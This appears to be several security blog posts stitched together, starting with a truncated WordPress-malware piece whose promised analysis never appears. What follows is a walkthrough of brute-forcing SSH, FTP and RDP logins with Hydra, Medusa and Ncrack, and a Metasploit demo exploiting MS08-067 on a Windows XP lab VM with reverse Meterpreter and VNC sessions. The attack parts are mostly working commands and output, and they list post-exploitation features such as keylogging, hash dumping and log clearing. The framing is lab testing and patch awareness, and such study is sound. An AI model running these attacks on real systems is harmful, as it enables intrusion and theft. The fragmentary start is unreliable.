It had malware inserted into it that is of a much more malicious and spammy nature. Further investigation reveals that ALL of the themes on that site contain basically the same code. This code is not actually “viral”, but it’s definitely malware and it’s worth investigating to see some of the ways people try to hide their spam.

So today, I’m going to dissect it and serve it up on a platter for everybody to see.

Anatomy of a theme malware

Other excellent posts on this topic include:
Jaypee writes on WordPress Theme Malware
Analysis of Top Google Results for Free WordPress Themes

The post Malware in WordPress Themes appeared first on HackerTarget.com.

This article will focus on tools that allow remote service brute-forcing. These are typically Internet facing services that are accessible from anywhere in the world. Another type of password brute-force attack are against the password hash. Powerful tools such as Hashcat can crack encrypted password hashes on a local system.

The three tools assessed are Hydra, Medusa and Ncrack (from nmap.org).

Installation

Installation of all three tools was straight forward on Ubuntu Linux. Use the standard method to compile an application from source. Alternatively the three tools come pre-packages on Kali.

wget https://nmap.org/ncrack/dist/ncrack-0.7.tar.gz
./configure
make
make install

wget https://github.com/vanhauser-thc/thc-hydra/archive/v9.0.tar.gz
./configure
make
make install

wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz
./configure
make
make install

Password List

I grabbed a list of 500 passwords from skullsecurity.org. Of course, you can find password lists with many thousands or even millions of passwords. You will need to choose what is most appropriate for your password testing as factors such as target type and rate of testing will be major factors.

wget https://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2

bzip2 -d 500-worst-passwords.txt.bz2

Series of tests

The following tests were performed against a Linux Virtual Machine running on Virtualbox. Speed will vary depending on whether the target is local, the latency of the connection, and even the processing power of the target system. Heavy brute forcing can impact a targets CPU potentially causing a denial of service condition. Take care if testing production systems.

Test 1 - SSH

The first series of tests was against SSH. I set the root account with the password toor. I added toor to the end of the 500 password list at number 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10   login: root   password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Successfully found the password with Hydra!

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Successfully found the password with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds

Success again with Medusa, however it took over 10 times as long with the default settings of each tool.

Test 2 - Speed

Lets try and speed things up a bit.

Cranking up Medusa speed to use 5 concurrent logins fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)' failed.
Aborted

Trying Ncrack at a faster rate was a bit faster but not much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Is Hydra any faster? Here I added the option for 32 threads.

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10   login: root   password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the speed of response from the VirtualBox machine. Either way, it appears the default speed is pretty good for both tools.

Test 3 - FTP server

Now to try hitting the FTP server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 69.01 seconds.

Attempting to push it faster....

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops, did we crash the FTP service?

Now testing with Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Medusa also appears to be struggling.

Lets go back and check again with ncrack to ensure the service is still ok.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!

ncrack has the ability to also brute force RDP accounts. Lets hit a Windows box with Microsoft Remote Desktop Protocol enabled.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'

Ncrack done: 1 service scanned in 6072 seconds.

Protocol support varies for the different tools:

Hydra - TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa -  AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

Ncrack - RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

Conclusion

There is much more that could be tested for a more comprehensive review. Other protocols, different targets, latency, and further tweaking of the scan speeds and threads.

While ncrack has limited protocol support compared to Hydra and Medusa, the only conclusion for this little test when it comes to speed, reliability, and the ability to hit RDP services ncrack wins!!

Note:
Problems noted above regarding Hydra have been addressed and after testing it can be confirmed these issues are no longer present.

CHANGELOG for 6.4
   =================
   * Update SIP module to extract and use external IP addr return from server error to bypass NAT
   * Update SIP module to use SASL lib
   * Update email modules to check clear mode when TLS mode failed
   * Update Oracle Listener module to work with Oracle DB 9.2
   * Update LDAP module to support Windows 2008 active directory simple auth
   * Fix to the connection adaptation engine which would loose planned attempts
   * Fix make script for CentOS, reported by ya0wei
   * Print error when a service limits connections and few pairs have to be tested
   * Improved Mysql module to only init/close when needed
   * Added patch from the FreeBSD maintainers
   * Module usage help does not need a target to be specified anymore
   * configure script now honors /etc/ld.so.conf.d/ directory 

The post Brute Forcing Passwords with ncrack, hydra and medusa appeared first on HackerTarget.com.

Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with Core Impact and Canvas in the pen-testing community.

Here is a quick and dirty introduction to running it on Ubuntu Linux 10.04. Of course it will run just as easily on Fedora Linux, Windows or whatever Operating System floats your boat.

Download the framework from https://www.metasploit.com/get-started

I chose the binary version for 64 bit Linux.

Ruby is not installed by default in Ubuntu so start off with:

apt-get install ruby
chmod +x framework-3.4.0-linux-x86_64.run
 ./framework-3.4.0-linux-x86_64.run 
Verifying archive integrity... All good.
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)........


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

Metasploit Framework v3.4.0 Release
    Report Bugs: msfdev@metasploit.com


Warning: A copy of Metasploit already exists at /opt/metasploit3
         continuing this installation will DELETE the previous  
         install, including all user-modified files.

Please enter 'yes' to continue or any other key to abort
Continue (yes/no) > yes

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Removing files from the previous installation...

Extracting the Metasploit operating environment...

Extracting the Metasploit Framework...

Installing links into /usr/local/bin...

Installation complete.

Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes


*** snip ***

Updated to revision 9390.

Launch the Metasploit console by running 'msfconsole'

Exiting the installer...
root@testbox:/home/testuser/Downloads# msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
       =[ svn r9390 updated today (2010.06.01)

msf > exit

We have a working Metasploit, hoorah for us.

Exploit

Let's do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in a Sun Virtual box using Host Only Networking as we will see shortly.

I like to use the command line utility for msf (msfcli) as once you get used to the syntax it is easier and faster. However if you prefer go with the msfconsole.

Running #msfcli will list all exploits, payloads and other modules.

#msfcli | grep 08_067
exploit/windows/smb/ms08_067_netapi

Lets hit my windows box with exploit/windows/smb/ms08_067_netapi it is stable and works very well.

#msfcli  exploit/windows/smb/ms08_067_netapi
[*] Please wait while we load the module tree...
Usage: /opt/metasploit3/msf3/msfcli   [mode]
========================================================================

    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

#msfcli  exploit/windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples. A reverse meterpreter and a vnc reverse dll injection.
#msfcli exploit/windows/smb/ms08_067_netapi P

My windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] 	Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe
[*] Getting Windows Built in Firewall configuration...
[*] 	
[*] 	Domain profile configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Standard profile configuration (current):
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Disable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Local Area Connection firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] 	Local Area Connection 2 firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] Checking DEP Support Policy...
meterpreter > run get_local_subnets
Local subnet: 10.0.2.0/255.255.255.0
Local subnet: 192.168.56.0/255.255.255.0
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >  pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter >  ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2009-12-22 05:59:31 +1100  $AVG
100777/rwxrwxrwx  0          fil   2009-12-22 05:39:51 +1100  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2009-12-22 05:39:51 +1100  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2010-02-12 15:23:25 +1100  Documents and Settings
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  IO.SYS
40777/rwxrwxrwx   0          dir   2010-02-11 13:11:43 +1100  Inetpub
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2004-08-04 22:00:00 +1000  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2010-04-08 15:57:51 +1000  Program Files
40777/rwxrwxrwx   0          dir   2010-04-09 13:14:56 +1000  RECYCLER
40777/rwxrwxrwx   0          dir   2009-12-22 05:43:08 +1100  System Volume Information
40777/rwxrwxrwx   0          dir   2010-04-09 13:18:19 +1000  WINDOWS
100666/rw-rw-rw-  211        fil   2009-12-22 05:35:20 +1100  boot.ini
100444/r--r--r--  250032     fil   2004-08-04 22:00:00 +1000  ntldr
100666/rw-rw-rw-  301989888  fil   2010-06-01 02:21:17 +1000  pagefile.sys

The power of the meterpreter is really only limited by your imagination. Keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline.....

A VNC injection

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "snipped"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)

This should pop up a vnc session with full desktop control of your Windows XP SP2 Host. This is a dramatic way to show people the power of metasploit and to reinforce the need for patching to your users.

I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.

The post Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction appeared first on HackerTarget.com.